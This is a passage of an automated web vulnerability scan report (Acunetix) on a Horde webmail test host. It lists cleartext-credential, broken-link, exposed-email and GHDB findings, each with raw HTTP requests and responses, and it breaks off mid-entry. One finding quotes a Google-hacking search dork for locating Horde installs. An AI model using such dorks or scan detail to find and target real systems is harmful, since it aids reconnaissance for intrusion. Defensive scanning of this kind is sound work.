Date: Sun, 22 May 2011 15:13:09 GMT
/imp/login.php (9b42f8057a8701d8c0448698f0d7a0ff)
Details
It seemes that user credentials are sent to /imp/redirect.php in clear text.
Request
GET /imp/login.php?new_lang=Bahasa%20Indonesia HTTP/1.1
Pragma: no-cache
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: filelist;aspectalerts
Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/login.php
Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208
Host: vulnerable.horde.webmail.version3.3.11.host
Connection: Keep-alive
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Vary: Accept-Language
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 22 May 2011 15:13:21 GMT
Content-Length: 10191
/imp/login.php (a12e6bd4443144c1b8c23ea00c2ffe38)
Details
It seemes that user credentials are sent to /imp/redirect.php in clear text.
Request
GET /imp/login.php?new_lang=Catal%26%23xe0; HTTP/1.1
Pragma: no-cache
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: filelist;aspectalerts
Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/login.php
Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208
Host: vulnerable.horde.webmail.version3.3.11.host
Connection: Keep-alive
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Vary: Accept-Language
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 22 May 2011 15:13:21 GMT
Content-Length: 10191
/imp/login.php (a2ba6948a038d7a3a440afb1fc9eceed)
Details
It seemes that user credentials are sent to /imp/redirect.php in clear text.
Acunetix Website Audit40
Request
GET /imp/login.php?new_lang=%26%23x010c;esky HTTP/1.1
Pragma: no-cache
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: filelist;aspectalerts
Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/login.php
Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208
Host: vulnerable.horde.webmail.version3.3.11.host
Connection: Keep-alive
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Vary: Accept-Language
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 22 May 2011 15:13:21 GMT
Content-Length: 10191
/imp/login.php (b0db092b89360e30820e995c6abbbc83)
Details
It seemes that user credentials are sent to /imp/redirect.php in clear text.
Request
GET /imp/login.php?app=imp&horde_logout_token=g9u7H-78CHQyg9CQNPHaIUumuT8&imapuser=grwtfvif&logout_reason=badlogin&server=pop HTTP/1.1
Pragma: no-cache
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: filelist;aspectalerts
Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php
Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208
Host: vulnerable.horde.webmail.version3.3.11.host
Connection: Keep-alive
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Vary: Accept-Language
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 22 May 2011 15:13:13 GMT
Content-Length: 10395
/imp/login.php (b3cb8470038a18bddad7a22934963f28)
Details
It seemes that user credentials are sent to /imp/redirect.php in clear text.
Request
GET /imp/login.php?app=imp&horde_logout_token=UVdJ_qdy2FCjlafyUTTJOJOjkUM&imapuser=tjmxnsfk&logout_reason=badlogin&server=pop HTTP/1.1
Acunetix Website Audit41
Pragma: no-cache
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: filelist;aspectalerts
Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php
Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208
Host: vulnerable.horde.webmail.version3.3.11.host
Connection: Keep-alive
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Vary: Accept-Language
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 22 May 2011 15:13:09 GMT
Content-Length: 10396
/imp/login.php (b6658f01c57b6184aa9e241e81e8115a)
Details
It seemes that user credentials are sent to /imp/redirect.php in clear text.
Request
GET /imp/login.php?app=imp&horde_logout_token=X15QsD-1zAYbNp-KXZCaCs97Ev4&imapuser=uwbkfapt&logout_reason=badlogin&server=pop HTTP/1.1
Pragma: no-cache
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: filelist;aspectalerts
Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php
Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208
Host: vulnerable.horde.webmail.version3.3.11.host
Connection: Keep-alive
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Vary: Accept-Language
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 22 May 2011 15:13:09 GMT
Content-Length: 10396
/imp/login.php (b80345ac9e258e2e5fc0788690b47d67)
Details
It seemes that user credentials are sent to /imp/redirect.php in clear text.
Request
GET /imp/login.php?new_lang=Bosanski HTTP/1.1
Pragma: no-cache
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: filelist;aspectalerts
Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/login.php
Acunetix Website Audit42
Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208
Host: vulnerable.horde.webmail.version3.3.11.host
Connection: Keep-alive
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Vary: Accept-Language
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 22 May 2011 15:13:21 GMT
Content-Length: 10191
/imp/login.php (eb39b850bb307c9b610a48be2af0d636)
Details
It seemes that user credentials are sent to /imp/redirect.php in clear text.
Request
GET /imp/login.php?app=imp&horde_logout_token=WpLNAAqx7QwZs-m-mA-TXAsylgU&imapuser=gmbrshlo&logout_reason=badlogin&server=pop HTTP/1.1
Pragma: no-cache
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: filelist;aspectalerts
Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php
Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208
Host: vulnerable.horde.webmail.version3.3.11.host
Connection: Keep-alive
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Vary: Accept-Language
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 22 May 2011 15:13:13 GMT
Content-Length: 10396
/imp/login.php (f9867d029cae700bee7e0e09c3c5e9bc)
Details
It seemes that user credentials are sent to /imp/redirect.php in clear text.
Request
GET /imp/login.php?app=imp&horde_logout_token=5HmQhu81IJ8NQd3wg4Xsyucnj7Q&imapuser=lwnnwvll&logout_reason=badlogin&server=pop HTTP/1.1
Pragma: no-cache
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: filelist;aspectalerts
Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php
Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208
Host: vulnerable.horde.webmail.version3.3.11.host
Acunetix Website Audit43
Connection: Keep-alive
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Vary: Accept-Language
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 22 May 2011 15:13:13 GMT
Content-Length: 10396
/imp/login.php (fa2cb8a65862e58974030595118192cb)
Details
It seemes that user credentials are sent to /imp/redirect.php in clear text.
Request
GET /imp/login.php?new_lang=%26%23x202d;Arabic%20(Oman)%20%26%23x202e;(%26%23x0627;%26%23x0644;%26%23x0639;%26%23x0631;%26%23x0628;%26%23x064a;%26%23x0629;) HTTP/1.1
Pragma: no-cache
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: filelist;aspectalerts
Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/login.php
Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208
Host: vulnerable.horde.webmail.version3.3.11.host
Connection: Keep-alive
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Vary: Accept-Language
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 22 May 2011 15:13:21 GMT
Content-Length: 10190
/imp/redirect.php
Details
It seemes that user credentials are sent to /imp/redirect.php in clear text.
Request
GET /imp/redirect.php HTTP/1.1
Pragma: no-cache
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: filelist;aspectalerts
Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/login.php
Cookie: Horde=cc98ab8bb445fe090d5f7b594f58e208; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208
Host: vulnerable.horde.webmail.version3.3.11.host
Connection: Keep-alive
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*
Response
Acunetix Website Audit44
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Vary: Accept-Language
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 22 May 2011 15:13:03 GMT
Content-Length: 10193
/imp/test.php
Details
It seemes that user credentials are sent to /imp/test.php in clear text.
Request
GET /imp/test.php HTTP/1.1
Pragma: no-cache
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: filelist;aspectalerts
Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/
Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208
Host: vulnerable.horde.webmail.version3.3.11.host
Connection: Keep-alive
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Vary: Accept-Language
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 22 May 2011 16:36:45 GMT
Content-Length: 4560
Broken links
 
SeverityInformational
TypeInformational
Reported by moduleCrawler
Description
A broken link refers to any link that should take you to a document, image or webpage, that actually results in an error. This page was linked from the website but it is inaccessible.
Impact
Problems navigating the site.
Recommendation
Remove the links to this file or make it accessible.
Affected items
/imp/function.session-regenerate-id
Details
No details are available.
Request
GET /imp/function.session-regenerate-id HTTP/1.1
Pragma: no-cache
Acunetix Website Audit45
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: filelist;aspectalerts
Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php
Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208
Host: vulnerable.horde.webmail.version3.3.11.host
Connection: Keep-alive
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Response
HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 22 May 2011 15:13:08 GMT
Content-Length: 1245
Email address found
 
SeverityInformational
TypeInformational
Reported by moduleScripting (Text_Search.script)
Description
One or more email addresses have been found on this page. The majority of spam comes from email addresses harvested off the internet. The spam-bots (also known as email harvesters and email extractors) are programs that scour the internet looking for email addresses on any website they come across. Spambot programs look for strings like myname@mydomain.com and then record any addresses found.
Impact
Email addresses posted on Web sites may attract spam.
Recommendation
Check references for details on how to solve this problem.
Affected items
/imp/themes/wps_sober/screen.css
Details

Pattern found:
md@webbplatsen.se
Request
GET /imp/themes/wps_sober/screen.css HTTP/1.1
Pragma: no-cache
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: filelist;aspectalerts
Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/login.php
Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208
Host: vulnerable.horde.webmail.version3.3.11.host
Connection: Keep-alive
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*
Response
HTTP/1.1 200 OK
Acunetix Website Audit46
Content-Type: text/css
Last-Modified: Tue, 11 Apr 2006 16:27:08 GMT
Accept-Ranges: bytes
ETag: "0d6dbc6845dc61:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 22 May 2011 15:13:05 GMT
/themes/wps_sober/screen.css
Details

Pattern found:
md@webbplatsen.se
Request
GET /themes/wps_sober/screen.css HTTP/1.1
Pragma: no-cache
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: filelist;aspectalerts
Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/login.php
Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208
Host: vulnerable.horde.webmail.version3.3.11.host
Connection: Keep-alive
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*
Response
HTTP/1.1 200 OK
Content-Type: text/css
Last-Modified: Tue, 21 Dec 2010 19:25:16 GMT
Accept-Ranges: bytes
ETag: "076d8cb44a1cb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 22 May 2011 15:13:05 GMT
Content-Length: 19078
GHDB: Horde Mail
 
SeverityInformational
TypeInformational
Reported by moduleGHDB
Description

The description for this alert is contributed by the GHDB community, it may contain inappropriate language.

Category : Advisories and Vulnerabilities

Horde Mail is web based email software, great for checking messages on the road. Several vulnerabilities were reported to Security Focus.

The Google Hacking Database (GHDB) appears courtesy of the Google Hacking community.
Impact
Not available. Check description.
Acunetix Website Audit47
Recommendation
Not available. Check description.
Affected items
/imp
Details
We found
intitle:welcome.to.horde
Request
GET /imp/ HTTP/1.1
Pragma: no-cache
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: filelist;aspectalerts
Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/
Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208
Host: vulnerable.horde.webmail.version3.3.11.host
Connection: Keep-alive
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Vary: Accept-Language
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 22 May 2011 15:13:11 GMT
Content-Length: 10191
/imp/index.php
Details
We found
intitle:welcome.to.horde
Request
GET /imp/index.php HTTP/1.1
Pragma: no-cache
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: filelist;aspectalerts
Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208
Host: vulnerable.horde.webmail.version3.3.11.host
Connection: Keep-alive
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Vary: Accept-Language
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 22 May 2011 15:13:11 GMT
Acunetix Website Audit48
 
/imp/login.php
Details
We found
intitle:welcome.to.horde
Request
GET /imp/login.php HTTP/1.1
Pragma: no-cache
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: filelist;aspectalerts
Host: vulnerable.horde.webmail.version3.3.11.host
Connection: Keep-alive
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Vary: Accept-Language
Server: Microsoft-IIS/7.5
Set-Cookie: Horde=cc98ab8bb445fe090d5f7b594f58e208; path=/; domain=vulnerable.horde.webmail.version3.3.11.host
Set-Cookie: imp_key=cc98ab8bb445fe090d5f7b594f58e208; path=/; domain=vulnerable.horde.webmail.version3.3.11.host
Set-Cookie: auth_key=cc98ab8bb445fe090d5f7b594f58e208; path=/; domain=vulnerable.horde.webmail.version3.3.11.host
X-Powered-By: ASP.NET
Date: Sun, 22 May 2011 15:13:03 GMT
Content-Length: 10312
/imp/login.php (0543eee9a9fc90cdbcebb4184dc0f436)
Details
We found
intitle:welcome.to.horde
Request
GET /imp/login.php?app=imp&horde_logout_token=UkHoj_BUzaHgQnp7cwu9IPDGdx0&imapuser=cderdwxu&logout_reason=badlogin&server=pop HTTP/1.1
Pragma: no-cache
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: filelist;aspectalerts
Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php
Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208
Host: vulnerable.horde.webmail.version3.3.11.host
Connection: Keep-alive
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Vary: Accept-Language
Server: Microsoft-IIS/7.5
Acunetix Website Audit49
X-Powered-By: ASP.NET
Date: Sun, 22 May 2011 15:13:13 GMT
/imp/login.php (158764c7d282ec5f81da00419114f313)
Details
We found
intitle:welcome.to.horde
Request
GET /imp/login.php?new_lang=%26%23x202d;Chinese%20(Traditional)%20(%26%23x6b63;%26%23x9ad4;%26%23x4e2d;%26%23x6587;) HTTP/1.1
Pragma: no-cache
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: filelist;aspectalerts
Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/login.php
Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208
Host: vulnerable.horde.webmail.version3.3.11.host
Connection: Keep-alive
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Vary: Accept-Language
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 22 May 2011 15:13:22 GMT
Content-Length: 10190
/imp/login.php (1d46c5eb93aa7d11eef06bf0a0191c08)
Details
We found
intitle:welcome.to.horde
Request
GET /imp/login.php?app=imp&horde_logout_token=9kdIZoVZfUu0i92_Wr0XpxEkycw&imapuser=kknytbhi&logout_reason=badlogin&server=pop HTTP/1.1
Pragma: no-cache
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: filelist;aspectalerts
Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php
Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208
Host: vulnerable.horde.webmail.version3.3.11.host
Connection: Keep-alive
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Vary: Accept-Language
Acunetix Website Audit50
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 22 May 2011 15:13:09 GMT
/imp/login.php (1d86503a775e69aaf8cfae2e3c4262b8)
Details
We found
intitle:welcome.to.horde
Request
GET /imp/login.php?app=imp&horde_logout_token=8MnlK_AkVv_w-etJcyh00h3qZtk&imapuser=atsoewoc&logout_reason=badlogin&server=pop HTTP/1.1
Pragma: no-cache
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: filelist;aspectalerts
Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php
Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208
Host: vulnerable.horde.webmail.version3.3.11.host
Connection: Keep-alive
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Vary: Accept-Language
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 22 May 2011 15:13:09 GMT
Content-Length: 10396
/imp/login.php (218aabb29b4f5701fbeef27d6e22e8ae)
Details
We found
intitle:welcome.to.horde
Request
GET /imp/login.php?new_lang=%26%23x202d;Bulgarian%20(%26%23x0411;%26%23x044a;%26%23x043b;%26%23x0433;%26%23x0430;%26%23x0440;%26%23x0441;%26%23x043a;%26%23x0438;) HTTP/1.1
Pragma: no-cache
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: filelist;aspectalerts
Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/login.php
Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208
Host: vulnerable.horde.webmail.version3.3.11.host
Connection: Keep-alive
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Acunetix Website Audit51
Vary: Accept-Language
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 22 May 2011 15:13:21 GMT
/imp/login.php (28fc832e122bfd3d7aa0d9fc9e93c214)
Details
We found
intitle:welcome.to.horde
Request
GET /imp/login.php?app=imp&horde_logout_token=fxkAiJl0cUvTGsyglzEAgwmsGvk&imapuser=bsximucj&logout_reason=badlogin&server=pop HTTP/1.1
Pragma: no-cache
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: filelist;aspectalerts
Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php
Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208
Host: vulnerable.horde.webmail.version3.3.11.host
Connection: Keep-alive
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Vary: Accept-Language
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 22 May 2011 15:13:09 GMT
Content-Length: 10396
/imp/login.php (2a85dcb007870d301225d725fb7aced5)
Details
We found
intitle:welcome.to.horde
Request
GET /imp/login.php?app=imp&horde_logout_token=S9hLBWmjg9w-hz-Cez65kwSQFDI&imapuser=hkuhjfvd&logout_reason=badlogin&server=pop HTTP/1.1
Pragma: no-cache
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: filelist;aspectalerts
Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php
Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208
Host: vulnerable.horde.webmail.version3.3.11.host
Connection: Keep-alive
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Acunetix Website Audit52
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Vary: Accept-Language
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 22 May 2011 15:13:10 GMT
/imp/login.php (36ce5744f27f6f06f85c2dac9f0ac09c)
Details
We found
intitle:welcome.to.horde
Request
